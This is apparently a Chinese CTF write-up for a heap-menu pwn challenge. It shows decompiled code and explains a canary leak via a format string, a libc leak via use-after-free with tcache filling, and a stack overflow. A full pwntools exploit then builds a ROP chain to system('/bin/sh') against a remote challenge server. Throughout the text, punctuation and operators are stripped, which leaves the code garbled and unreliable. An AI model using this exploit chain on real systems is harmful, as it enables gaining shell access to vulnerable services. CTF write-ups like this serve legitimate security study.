题目分析保护全开这里格式化漏洞可以泄露canarypie地址libc地址void__noreturnmenu(){intid;// eaxchars[4];// [rsp4h] [rbp-Ch] BYREFunsigned__int64 v2;// [rsp8h] [rbp-8h]v2__readfsqword(0x28u);while(1){cls();puts(\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n);puts(Welcome to my secret sling ring factory.);puts(What do you want to do today?\n);puts(1. Show Forged Rings);puts(2. Forge Sling Ring);puts(3. Discard Sling Ring);puts(4. Use Sling Ring);printf( );fgets(s,4,stdin);fflush(stdin);putchar(10);idatoi(s);if(id4){use_slingring();exit(0);}if(id4){LABEL_12:puts(Invalid input!);puts(Press ENTER to go back...);getchar();}else{switch(id){case3:discard_slingring();break;case1:show_slingrings();break;case2:forge_slingring();break;default:gotoLABEL_12;}}}}menu这里是个菜单应该就是一个堆利用菜单题show()函数是打印所有chunk内容同时discard函数里free完没有指针归NULL有UAF所以可以打印free chunk的内容intuse_slingring(){chars[4];// [rspCh] [rbp-44h] BYREFchars_1[56];// [rsp10h] [rbp-40h] BYREFunsigned__int64 v3;// [rsp48h] [rbp-8h]v3__readfsqword(0x28u);printf(Which ring would you like to use (id): );fgets(s,4,stdin);fflush(stdin);atoi(s);printf(\nPlease enter the spell: );fgets(s_1,256,stdin);puts(\nThank you for visiting our factory! We will now transport you.);returnputs(\nTransporting...);}这里还有个栈溢出所以这道题就是利用格式化字符串来泄露canary利用堆来泄露libc然后栈溢出拿shell还是非常简单的。Poc构造先用%7$p来泄露canary然后构造poc由于是glibc2.31有tcache需要先填满7个tcache然后才能用fastbin所以分配八个释放八个注意还要跟top隔断然后show即可泄露libc后面直接栈溢出就行expfrompwnimport*importsys exeELF(./pwn2_patched)libcELF(./libc-2.31.so)ldELF(./ld-2.31.so)context.binaryexe context.log_leveldebuglocal0iflocal:pprocess(./pwn2_patched)#gdb.attach(p)else:premote(39.96.193.120,10006)defforge(id,des,amount):p.sendlineafter(b ,b2)p.sendlineafter(brings!,str(id).encode())p.sendlineafter(blocation:,des)p.sendlineafter(b(1-9):,str(amount).encode())defshow():p.sendlineafter(b ,b1)defdiscard(id):p.sendlineafter(b ,b3)p.sendlineafter(bdiscard?,str(id).encode())p.recvuntil(bWhat is your name?)p.sendline(b%7$p)p.recvuntil(b0x)canaryint(p.recv(16),16)log.info(fcanary {hex(canary)})foriinrange(10):forge(i,b1,1)p.sendline()foriinrange(9):discard(i)show()p.recvuntil(bRing Slot #7 | [144] | )leaku64(p.recv(6).ljust(8,b\x00))print(fleak {hex(leak)})libc_baseleak-0x1ECBE0log.info(flibc_base {hex(libc_base)})system_addrlibc_baselibc.sym[system]bin_sh_addrlibc_basenext(libc.search(/bin/sh))pop_rdi_addrlibc_base0x0000000000023b6aret_addrlibc_base0x0000000000022679p.sendline()p.sendlineafter(b ,b4)p.sendlineafter(bWhich ring would you like to use (id): ,b6)payloadba*0x38p64(canary)p64(0)p64(ret_addr)p64(pop_rdi_addr)p64(bin_sh_addr)p64(system_addr)p.sendlineafter(bPlease enter the spell: ,payload)p.interactive()
